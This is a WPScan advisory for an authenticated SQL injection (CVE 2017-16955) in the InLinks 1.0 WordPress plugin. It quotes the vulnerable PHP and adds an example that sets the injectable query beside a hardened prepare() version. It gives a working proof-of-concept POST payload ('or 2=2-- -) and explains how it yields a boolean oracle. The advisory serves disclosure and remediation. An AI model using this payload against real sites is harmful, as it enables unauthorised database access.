InLinks 1.0 - Authenticated SQL Injection


Description
SQL injection in the POST parameter "keyword", which is concatenated into a SELECT query without escaping or a prepared statement.

Affected file inlinks/inlinks.php

Affected lines:

58     $Keyword = trim($_POST['keyword']);
59     $URL = trim($_POST['url']);
60     $Rel = trim($_POST['rel']);
61     $Target = trim($_POST['target']);
62     $table_name = $wpdb->prefix ."URLKeywordsMapping";
63     $SelectKeywordURLMappingDetails = "select * from $table_name where FldKeyword LIKE '".$Keyword."'" ;
64
65     $KeywordURLMappingDetails = $wpdb->get_results($SelectKeywordURLMappingDetails);
66
67     if(count($KeywordURLMappingDetails))
68     {
69         $Message = "<div align='center' style=\"color:red; font-weight:bold;\">The keyword <i>".$Keyword."</i> already exists in the table.</div>";
70     }

More issues are likely to exist elsewhere in the plugin, given the lack of input validation and the absence of prepared statements ($wpdb->prepare) throughout the affected code.
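The following is an added example, not code from the plugin or from the advisory author. It puts the original string-concatenated query next to a hardened rewrite that uses WordPress's $wpdb->prepare() and $wpdb->esc_like(), and feeds both the advisory's payload. The MiniWpdb class is an assumed, minimal stand-in for the WordPress $wpdb object so the file runs under plain php; inside WordPress the real global $wpdb is used instead, and its prepare() escapes through the MySQL driver rather than addslashes(). The table prefix "wp_" is an assumption.

```php
<?php
// Added example: vulnerable query construction from inlinks.php beside a
// hardened version. MiniWpdb is an assumed stand-in for WordPress's $wpdb,
// present only so this file runs stand-alone with `php`.

class MiniWpdb {
    public $prefix = 'wp_';   // assumed table prefix

    // Stand-in for $wpdb->esc_like(): escapes LIKE wildcards and backslash
    // so user input cannot act as a pattern (WordPress does the same thing).
    public function esc_like($text) {
        return addcslashes($text, '_%\\');
    }

    // Stand-in for $wpdb->prepare(): each %s becomes a quoted, escaped
    // literal. The real implementation uses the driver's escaping; addslashes()
    // is used here only to keep the example self-contained.
    public function prepare($query, ...$args) {
        $quoted = array_map(function ($a) { return "'" . addslashes($a) . "'"; }, $args);
        return vsprintf($query, $quoted);
    }
}

// The original construction: the raw POST value is spliced into the SQL text,
// so a single quote in $keyword terminates the string literal.
function vulnerable_query(MiniWpdb $wpdb, $keyword) {
    $table_name = $wpdb->prefix . "URLKeywordsMapping";
    return "select * from $table_name where FldKeyword LIKE '" . $keyword . "'";
}

// Hardened version: esc_like() neutralises % and _ in the value, prepare()
// quotes and escapes it. The table name is not user-controlled (it derives
// from $wpdb->prefix) and placeholders cannot be used for identifiers, so it
// is interpolated directly.
function hardened_query(MiniWpdb $wpdb, $keyword) {
    $table_name = $wpdb->prefix . "URLKeywordsMapping";
    return $wpdb->prepare(
        "SELECT * FROM {$table_name} WHERE FldKeyword LIKE %s",
        $wpdb->esc_like($keyword)
    );
}

$wpdb = new MiniWpdb();
// The advisory's POST "keyword" value, URL-decoded ("--+-" becomes "-- -").
$payload = "gweeperx'or 2=2-- -";

echo "vulnerable: ", vulnerable_query($wpdb, $payload), "\n";
echo "hardened:   ", hardened_query($wpdb, $payload), "\n";
```

In the vulnerable output the quote in the payload closes the literal, "or 2=2" makes the WHERE clause true for every row, and "-- -" comments out the trailing quote the plugin appends. Because the code only checks count($KeywordURLMappingDetails) and then prints "already exists", an always-true condition returns all rows and triggers that message, which gives an attacker a true/false oracle for boolean-based injection. In the hardened output the entire payload stays inside one string literal and matches nothing.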

Proof of Concept

Affected URL:

/wp-admin/options-general.php?page=inlinks%2Finlinks.php

POST Parameters (with payload):

keyword=gweeperx'or+2=2--+-&url=http%3A%2F%2F127.0.0.4&rel=nofollow&target=_blank&ActionType=AddKeywordURL&Add=Add

Affects Plugin

References

CVE 2017-16955
PACKETSTORM 145059

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Dimopoulos Elias
Submitter Website https://gr.linkedin.com/in/dimopouloselias/
Submitter Twitter DimopoulosElias
Views 214
Verified No
WPVDB ID 8962

Timeline

Publicly Published 2017-11-22
Added 2017-11-23
Last Updated 2017-11-27

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.